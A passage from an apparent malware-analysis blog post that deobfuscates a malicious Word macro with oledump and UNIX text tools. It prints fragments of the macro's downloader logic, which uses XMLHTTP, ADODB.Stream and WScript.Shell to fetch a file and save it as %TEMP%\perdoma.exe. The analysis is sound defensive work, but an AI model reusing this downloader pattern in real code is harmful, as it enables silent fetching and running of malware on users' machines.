strings copier@malwaremusings.com_20160129_084903\(13\).doc |grep "^Microsoft\." |sed ‘s#/$##’ |tr "/" "\012" |while read string; do
echo "s/mandata($idx)/\"$string\"/g"
idx="`expr $idx + 1`"
done |sed -f – Module2.tidy > Module2.tidier
[/code]
If you look at the Module2.tidier file you can get more of an idea as to what the macro code is doing:
[code]
Set ShaBADA1_1 = CreateObject("Microsoft.XMLHTTP")
Set ShaBADA1_2 = CreateObject("Adodb.Stream")
Set ShaBADA1_6 = CreateObject("Shell.Application")
Set hokuk = CreateObject("WScript.Shell")
Set ShaBADA1_3 = hokuk.Environment("Process")
…
ShaBADA1_1.Open "GET", AddFieldToField(ShaBADA1_7, 47), False
ShaBADA1_1.Send
ShaBADA1_4 = ShaBADA1_3("TEMP")
ShaBADA1_5 = ShaBADA1_4 + "\perdoma.exe"
[/code]
Ah ha. Now we could go a step further and substitute Microsoft.XMLHTTP for ShaBADA1_1; Adodb.Stream for ShaBADA1_2 etc., but that’ll take more time and make this post even longer. We have enough information to be able to block downloads of the payload, and to look for indicators of compromise (although I’d be guessing that that perdoma.exe will delete itself after running) so let’s stop there. We can now see that the macro is doing:
[code]
Microsoft.XMLHTTP.Open("GET",AddFieldToField(ShaBADA1_7,47),False)
[/code]
… so a HTTP GET on the deobfuscated Array data, and from the looks of it saving it to %TEMP%\perdoma.exe (the code to save it is in Module1), and on that note, I’m going to save some food to my stomach.
So there you have it. Analysis of a malicious Microsoft Word document resulting in the extraction of payload URLs and a file name, using Didier Stevens‘ oledump and standard UNIX (I haven’t used bash(1) extensions, so it should run on Solaris too, although I suspect that I may have used some GNU extensions in awk(1), which will require gawk(1) on Solaris) commands.